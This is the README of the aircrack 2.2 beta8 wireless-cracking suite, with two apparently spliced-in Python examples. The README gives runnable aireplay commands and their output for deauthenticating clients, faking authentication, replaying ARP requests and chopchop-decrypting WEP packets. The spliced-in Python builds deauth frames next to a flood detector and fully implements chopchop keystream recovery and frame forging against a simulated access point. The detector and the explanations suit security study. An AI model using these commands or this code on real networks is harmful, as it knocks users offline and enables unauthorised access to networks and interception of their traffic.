


                            aircrack 2.2 beta8



    Thanks for beta-testing this software! If you find bugs or
    have a feature request, mail me at cdevine@cr0.net.


    Please note that packet injection with aireplay only works
    with Prism2, Prism54 and Atheros cards. Injection on other
    chipsets (Centrino, Hermes, etc.) is NOT supported.


    Using aircrack
    ==============

        Options summary:
        ---------------

        -a amode : force the attack mode, 1 for WEP and 2 for WPA
        
        -e essid : select the target network based on the essid:
                   use all IVs from multiple APs with same ESSID.
                   also required to crack WPA-PSK if the ESSID is
                   cloaked (hidden).

        -b bssid : select the target network based on the access
                   point's MAC address

        -p nbcpu : on SMP systems, set this option to the number of CPUs

        -q       : quiet mode: no status information is displayed

        -c       : restrict the key search space to the ASCII character set

        -d start : force the beginning of the WEP key. only useful for
                   debugging purposes

        -m maddr : only keep the IVs coming from packets that match this
                   MAC address. alternatively, use -m ff:ff:ff:ff:ff:ff
                   to use each and every IV, regardless of the network
                   (this disables essid and bssid filtering)

        -i index : only keep the IVs that have this key index (1 to 4).
                   the default behaviour is to ignore the key index
                   in the packet, and use the IV regardless

        -f fudge : by default, this parameter is set to 2 for 104-bit WEP
                   and to 5 for 40-bit WEP. use a higher value to increase
                   the bruteforce level: cracking will take more time, but
                   with a higher likelihood of success

        -k korek : there are 17 korek attacks. sometimes one attack creates
                   a huge false positive that prevents the key from being
                   found, even with lots of IVs. try -k 1, -k 2, ... -k 17
                   to disable each attack selectively

        -x       : do not bruteforce the last two keybytes

        -y       : this is an experimental single bruteforce attack which
                   is only intended to be used when the standard attack
                   does not work with more than one million IVs.

        -w words : path to a dictionary file for WPA cracking

        -0       : ay, caramba


    Using airdecap
    ==============

        airdecap can decrypt WEP and WPA data packets. The 802.11
        capture is then transformed to a standard Ethernet capture.

        * convert 802.11 unencrypted traffic to Ethernet:

            airdecap -b 00:09:5B:10:BC:5A open-network.cap

        * decrypt WEP traffic:

            airdecap -w 11A3E229084349BC25D97E2939 wep.cap

        * decrypt WPA-PSK TKIP/CCMP traffic:

            airdecap -e my_essid -p my_passphrase tkip.cap


    Using airodump
    ==============

        Starting from 2.2-beta1, airodump automatically sets up the
        card in Monitor mode; it also takes care of channel hopping.
        The following chipsets are supported:

            * HermesI (patched orinoco)
            * Cisco Aironet (airo)
            * Centrino b/g (ipw2200)
            * Prism2/2.5/3 (wlan-ng or hostap)
            * PrismGT "FullMAC" (prism54)
            * Atheros (madwifi)

        Please note that ipw2100 is NOT officially supported -- this
        chipset does not properly discard packets with an invalid CRC.
        Also, ndiswrapper (Broadcom, Realtek, etc.) is NOT supported.


        You can use airodump to:

        * Analyse a capture file

            ./airodump out.cap toto 0

        * Convert a huge capture to a small .ivs file
          (only useful for WEP cracking)

            ./airodump huge.cap small 0 1

        * Capture packets

            ./airodump ath0 out 0

        The channel "0" above indicates that airodump should perform
        channel hopping. The channel number is ignored if the source
        is a capture file. When capturing IVs, it is best to disable
        channel hopping and specify the target AP's channel.

        Here's an example screenshot:

-----------------------------------------------------------------------
  BSSID              PWR  Beacons      IP / # Data  CH  MB  ENC  ESSID

  00:13:10:30:24:9C   59      159                3   7  48  WEP  test3

  BSSID              STATION            PWR   Packets  ESSID

  00:13:10:30:24:9C  00:09:5B:EB:C5:2B   60         7  test3
-----------------------------------------------------------------------

            - BSSID is the Access Point MAC address
            - PWR is the signal power, which depends on the driver
            - Beacons / Packets is the total number of frames seen,
              including beacons (an AP sends about 10 unencrypted beacon
              frames per second by default)
            - IP / # Data: if the network is unencrypted, its LAN IP
              addressing; otherwise the number of unique WEP
              Initialization Vectors (data packets) seen so far
            - CH is the channel on which the AP is set up
            - MB is the maximum communication speed.
            - ENC is the encryption protocol in use:
                OPN = open, WEP? = WEP or WPA (no data seen yet), WEP, WPA
            - ESSID is the network identifier

        The first part lists the detected access points (in this case, only
        00:13:10:30:24:9C on channel 7 with WEP encryption). The second part
        lists the detected wireless clients ("stations"), in this case
        00:09:5B:EB:C5:2B. By watching the signal power, one can even
        physically pinpoint the location of a given station.


    Using aireplay
    ==============

        Driver recompilation
        --------------------

        aireplay only supports injection on Atheros, Prism2/2.5/3 and
        Prism54 FullMAC. Injection on Centrino, HermesI (orinoco) and
        Aironet is currently *NOT* supported.

        For packet injection to work, the driver must be patched,
        recompiled and installed.

        If you don't know how to patch and recompile a driver, just
        use the WHAX Live CD (http://www.iwhax.net/).


        Installing hostap-driver-0.3.7  (Prism2 cards)
        ------------------------------

        Since aireplay-2.2-beta5, injection is fully supported
        in monitor mode on HostAP; it is much more stable than
        linux-wlan-ng.

cd /usr/src
wget http://hostap.epitest.fi/releases/hostap-driver-0.3.7.tar.gz
tar -xvzf hostap-driver-0.3.7.tar.gz
cd hostap-driver-0.3.7
patch -Np1 -i ~/aircrack-2.2-beta8/linux/patch/hostap-driver-0.3.7.patch.0.1
make clean && make && make install
mv -f /etc/pcmcia/wlan-ng.conf /etc/pcmcia/wlan-ng.conf~
ifconfig wlan0 down
wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
/etc/init.d/pcmcia restart
(reinsert card)

        By running "dmesg", you should see the card's primary (PRI)
        and station (STA) firmware:

wifi0: PRI: id=0x15 v1.1.1
wifi0: STA: id=0x1f v1.7.4

        If the firmware is older, you may want to upgrade it:

cd /usr/src
wget http://hostap.epitest.fi/releases/hostap-utils-0.3.7.tar.gz
tar -xvzf hostap-utils-0.3.7.tar.gz
cd hostap-utils-0.3.7
make
cp ~/aircrack-2.2-beta8/linux/prism2/*.hex .
./prism2_srec -f wlan0 pk010101.hex sf010704.hex

        Do not use the more recent firmware version (1.8.x), some
        problems have been reported with HostAP. If you have an older
        Prism2.0 card, you may need to use firmware 1.5.6 instead of
        1.7.4 (see http://linux.junsun.net/intersil-prism/firmware/).


        Installing linux-wlan-ng-0.2.1-pre26
        ------------------------------------

        linux-wlan-ng is an alternate driver for Prism2 cards. If you
        have a USB Prism2 device, you have no choice but to use wlan-ng,
        since HostAP doesn't support them.

        If you only have a PCI or PCMCIA Prism2 card, do NOT install
        this driver -- use HostAP instead: it is much more stable.

cd /usr/src
wget --passive-ftp ftp://ftp.linux-wlan.org/pub/linux-wlan-ng/linux-wlan-ng-0.2.1-pre26.tar.bz2
tar -xvjf linux-wlan-ng-0.2.1-pre26.tar.bz2
cd linux-wlan-ng-0.2.1-pre26
patch -Np1 -i ~/aircrack-2.2-beta8/linux/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1
make config
make all
find /lib/modules \( -name p80211* -o -name prism2* \) -exec rm -v {} \;
make -C src install
cp etc/pcmcia/wlan-ng.conf /etc/pcmcia/
mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
ifconfig wlan0 down
wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
/etc/init.d/pcmcia restart
(reinsert card)


        When injecting with a USB Prism2, aireplay sometimes hangs
        after a few thousand packets have been injected, or doesn't
        inject at all. This happens because of an unknown bug in
        the wlan-ng injection patch. I don't have a USB Prism2, so
        unfortunately I haven't been able to locate the problem.


        Installing madwifi  (Atheros cards)
        ------------------

        At the moment, the injection patch only makes it possible
        to inject in 802.11b mode. Injection in 802.11g mode is not
        supported. If the current CVS version does not work, you can
        download an older version of madwifi at http://madwifi.otaku42.de/

cd /usr/src
cvs -z3 -d:pserver:anonymous@cvs.sourceforge.net:/cvsroot/madwifi co madwifi
cd madwifi
patch -Np1 -i ~/aircrack-2.2-beta8/linux/patch/madwifi-20050309.patch.0.1
make
make install
modprobe ath_pci


        Installing prism54
        ------------------

        The latest prism54 driver supports injection out of the box and
        does not require any patch whatsoever.

        Make sure the hotplug package is installed and hotplug firmware
        loading support is present in your kernel (module firmware_class).

        If the kernel message buffer is flooded with timeout errors after
        loading the firmware, then the card is probably a "SoftMAC" model.
        At the moment, prism54 only works with FullMAC cards, which are
        an older and more expensive version of the PrismGT chipset.

        Jean-Baptiste Note has recently started working on a driver for
        PCI and USB SoftMAC devices. See http://jbnote.free.fr/prism54usb/

cd /usr/src
wget http://prism54.org/pub/linux/snapshot/tars/prism54-svn-latest.tar.bz2
tar -xvjf prism54-svn-latest.tar.bz2
cd prism54-svn-latest
make modules
make install
mkdir -p /usr/lib/hotplug/firmware
mkdir -p /lib/firmware
wget http://prism54.org/~mcgrof/firmware/1.0.4.3.arm
cp 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
cp 1.0.4.3.arm /lib/firmware/isl3890
modprobe prism54


        Quick reference
        ---------------

        A set of five different attacks has been implemented:

          -0 delay  : deauthenticate all stations
          -1 essid  : fake authentication with AP
          -2        : interactive frame selection
          -3        : standard ARP-request replay
          -4        : decrypt/chopchop WEP packet


        Attack 0: Deauthentication
        ==========================

        By forcing wireless clients to deauthenticate, it's often
        possible to generate ARP requests, since Windows clients
        will flush their ARP cache. Deauthentication is also useful
        for capturing hidden ESSIDs and WPA handshakes -- but make
        sure to run airodump (and aireplay -3 for ARP reinjection)
        in separate consoles.

# iwconfig ath0 mode Monitor channel 7
# ifconfig ath0 up

# ./aireplay -0 5 -a 00:13:10:30:24:9C ath0
12:17:20  Sending DeAuth to broadcast -- BSSID: [00:13:10:30:24:9C]
12:17:25  Sending DeAuth to broadcast -- BSSID: [00:13:10:30:24:9C]
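        The following is an added example and not aircrack's own code. It
        builds the frame aireplay -0 sends (an 802.11 management frame of
        subtype 12, addr1 = broadcast, addr2 = addr3 = the BSSID, body = a
        2-byte reason code) and pairs it with the defensive counterpart: a
        sliding-window detector that flags a deauthentication flood in a
        capture. The reason code, the window and the threshold are this
        example's assumptions, and the trace it runs on is constructed.

```python
"""Broadcast deauth frame as sent by a deauth tool, plus a flood detector (added example)."""
import struct
from collections import defaultdict, deque

# Frame control byte 0: protocol version 0, type 0 (management), subtype 12 (deauth)
FC_DEAUTH = 0xC0
# FC, flags, duration, addr1, addr2, addr3, sequence control (all little-endian)
MGMT_HDR = struct.Struct("<BBH6s6s6sH")
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join("%02x" % x for x in b)


def build_deauth(bssid: str, target: str = BROADCAST, seq: int = 0, reason: int = 7) -> bytes:
    """addr1 = DA (broadcast kicks every client), addr2 = SA and addr3 = BSSID are the
    AP's own MAC so clients believe the AP sent it. Reason 7 ('class 3 frame received
    from non-associated STA') is this example's choice, not a value taken from aireplay."""
    hdr = MGMT_HDR.pack(FC_DEAUTH, 0, 0, mac_bytes(target), mac_bytes(bssid),
                        mac_bytes(bssid), (seq & 0xFFF) << 4)
    return hdr + struct.pack("<H", reason)


def parse_deauth(frame: bytes):
    """Return addresses and reason of a deauth frame, or None for any other frame."""
    if len(frame) < MGMT_HDR.size + 2 or frame[0] != FC_DEAUTH:
        return None
    _fc, _flags, _dur, a1, a2, a3, sc = MGMT_HDR.unpack_from(frame)
    (reason,) = struct.unpack_from("<H", frame, MGMT_HDR.size)
    return {"da": mac_str(a1), "sa": mac_str(a2), "bssid": mac_str(a3),
            "seq": sc >> 4, "reason": reason}


def detect_deauth_flood(captures, window=1.0, threshold=10):
    """captures: iterable of (timestamp, raw 802.11 frame). A BSSID is reported the
    first time `threshold` deauths carrying its address fall within `window` seconds.
    Both numbers are tuning assumptions for this example."""
    recent = defaultdict(deque)
    alerts, flagged = [], set()
    for ts, frame in captures:
        d = parse_deauth(frame)
        if d is None:
            continue
        q = recent[d["bssid"]]
        q.append(ts)
        while q and ts - q[0] > window:     # drop timestamps that left the window
            q.popleft()
        if len(q) >= threshold and d["bssid"] not in flagged:
            flagged.add(d["bssid"])
            alerts.append((d["bssid"], ts, d["da"]))
    return alerts


def sample_capture():
    """Constructed trace: a burst of 20 broadcast deauths from one BSSID at 10 ms
    spacing, and three sparse unicast deauths from another AP (normal operation)."""
    frames = [(0.01 * i, build_deauth("00:13:10:30:24:9C", seq=i)) for i in range(20)]
    frames += [(5.0 * i, build_deauth("00:09:5B:10:BC:5A", "00:09:5B:EB:C5:2B",
                                      seq=i, reason=3)) for i in range(3)]
    frames.sort(key=lambda x: x[0])
    return frames


if __name__ == "__main__":
    for bssid, ts, da in detect_deauth_flood(sample_capture()):
        print("deauth flood from %s at t=%.2fs (DA %s)" % (bssid, ts, da))
```

        Only the first BSSID is reported: its 20 frames land inside one
        second, while the other AP's three unicast deauths are five seconds
        apart and never reach the threshold.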


        Attack 1: Fake authentication
        =============================

        For a WEP replay attack to work, you need the MAC address of
        an authenticated station. Thus, the -1 attack is quite useful
        to fake an authentication in Monitor mode, especially if there
        are no connected clients. If there is already a connected client,
        it's preferable to use its MAC address instead.

# ./aireplay -1 0 -e test3 -a 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B ath0

12:14:06  Sending Authentication Request
12:14:06  Authentication successful
12:14:06  Sending Association Request
12:14:07  Association successful :-)


        Attack 2: Interactive packet replay
        ===================================

        On its own this attack is of little use; it exists mainly to
        replay a frame you supply (-r file), for instance the ARP request
        forged with arpforge in attack 4 below.


        Attack 3: ARP-request replay
        ============================

        The classic ARP-request replay attack is the most effective
        to generate new IVs, and works very reliably.

# ./aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B -x 600 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2573 packets, sent 1255 packets...


        Attack 4: KoreK's "chopchop" attack
        ===================================

        This attack, when successful, can decrypt a WEP data packet
        without knowing the key. It can even work against dynamic
        WEP. However, not all access point brands are vulnerable;
        in fact this attack fails very often. It has been reported
        to be successful against WRT54G and Aironet.

        Once a packet is decrypted, it is fairly trivial to forge
        an ARP request and re-inject it.


        1. first we decrypt one packet

# ./aireplay -4 -h 00:09:5B:EB:C5:2B -x 600 ath0

        2. let's have a look at the IP address

# tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type IEEE802_11 (802.11)
02:23:01.582189 DA:ff:ff:ff:ff:ff:ff BSSID:00:13:10:30:24:9c SA:00:0e:0c:64:6d:21 LLC, dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03, IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

        3. forge the ARP request. the source IP doesn't matter,
           but the destination IP must respond to ARP requests.
           the source MAC must belong to an authenticated station.

# ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:09:5B:EB:C5:2B 192.168.1.2 192.168.1.1 arp.cap

        4. finally replay the ARP request

# ./aireplay -2 -r arp.cap ath0
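        The following is an added example, not code from aircrack, airdecap
        or arpforge. It covers the WEP frame body that airdecap -w decrypts
        (RC4 keyed with IV || key, CRC-32 ICV appended little-endian), runs
        the chopchop attack from step 1 against a simulated access point
        that holds the key and only answers "valid ICV / invalid ICV", and
        then forges a new frame under the recovered keystream the way
        arpforge does in step 3. Assumptions: the IV and payload are
        constructed (the key is the README's sample key), the simulated AP
        accepts any body with a correct ICV whereas real APs also drop runt
        frames and some brands never relay the test frames, so, as aireplay
        does, the LLC/SNAP header AA AA 03 00 00 00 is taken as known
        plaintext for the first bytes. The ICV fix-up is derived from the
        byte-wise CRC-32 update and is not specific to any AP.

```python
"""WEP encrypt/decrypt, simulated chopchop, forged frame (added example, not aircrack code)."""
import binascii
import struct

# Reflected CRC-32 table (polynomial 0xEDB88320), the CRC behind WEP's ICV.
CRC_TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    CRC_TABLE.append(c)
# Every entry has a distinct top byte, so the top byte identifies the index.
CRC_TABLE_INV = {entry >> 24: idx for idx, entry in enumerate(CRC_TABLE)}


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream (KSA + PRGA); WEP keys it with IV || secret key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Encrypted body = RC4(IV || key) XOR (data || ICV), ICV = CRC-32 little-endian."""
    body = data + struct.pack("<I", binascii.crc32(data))
    return xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, iv: bytes, enc_body: bytes):
    """airdecap -w per frame: strip the keystream, check the ICV; None on a bad ICV."""
    if len(enc_body) < 4:
        return None
    body = xor(enc_body, rc4(iv + key, len(enc_body)))
    data, icv = body[:-4], body[-4:]
    return data if struct.pack("<I", binascii.crc32(data)) == icv else None


def chop_correction(guess: int) -> int:
    """Word to XOR onto the last 4 bytes after chopping one byte whose plaintext is
    `guess` (the top byte of the old ICV). In the byte-wise CRC update that byte
    fixes the table index of the final step, so the fix-up depends on nothing else."""
    idx = CRC_TABLE_INV[guess ^ 0xFF]
    return (idx ^ 0xFF) | ((CRC_TABLE[idx] << 8) & 0xFFFFFF00)


def chopchop(oracle, enc_body: bytes, known_prefix=b"\xaa\xaa\x03\x00\x00\x00") -> bytes:
    """Recover one IV's keystream from an accept/reject oracle (the AP relaying or
    dropping frames). known_prefix is the assumed LLC/SNAP header of every data frame."""
    keystream = bytearray(len(enc_body))
    current = enc_body
    while len(current) > len(known_prefix) + 4:
        pos = len(current) - 1
        chopped = current[:-1]
        for guess in range(256):
            corr = struct.pack("<I", chop_correction(guess))
            cand = chopped[:-4] + xor(chopped[-4:], corr)
            if oracle(cand):                      # accepted: the ICV was valid
                keystream[pos] = current[pos] ^ guess
                current = cand
                break
        else:
            raise RuntimeError("no guess accepted at offset %d" % pos)
    # What is left encrypts known_prefix || ICV(known_prefix) under the same keystream.
    tail = known_prefix + struct.pack("<I", binascii.crc32(known_prefix))
    keystream[:len(tail)] = xor(current, tail)
    return bytes(keystream)


def wep_forge(keystream: bytes, data: bytes) -> bytes:
    """arpforge in miniature: the keyless ICV lets any short payload be encrypted for this IV."""
    body = data + struct.pack("<I", binascii.crc32(data))
    if len(body) > len(keystream):
        raise ValueError("not enough keystream for this payload")
    return xor(body, keystream)


def demo():
    key = bytes.fromhex("11A3E229084349BC25D97E2939")   # the README's sample WEP key
    iv = b"\x03\x3f\x7a"                                # constructed IV
    llc_arp = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"       # LLC/SNAP + ARP ethertype
    data = llc_arp + b"\x00\x01\x08\x00\x06\x04\x00\x01" + bytes(range(20))  # constructed
    enc = wep_encrypt(key, iv, data)
    oracle = lambda body: wep_decrypt(key, iv, body) is not None   # the AP; key stays inside
    ks = chopchop(oracle, enc)
    forged = wep_forge(ks, llc_arp + b"\x00\x01\x08\x00\x06\x04\x00\x01")
    return {"keystream_ok": ks == rc4(iv + key, len(enc)),
            "plaintext": xor(enc, ks)[:-4],
            "forged_accepted": oracle(forged)}
```

        Each round costs at most 256 oracle queries and yields one keystream
        byte from the end of the frame; the recovered keystream is what the
        .xor file in step 3 holds, and any payload no longer than the
        original can be encrypted with it for that IV.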

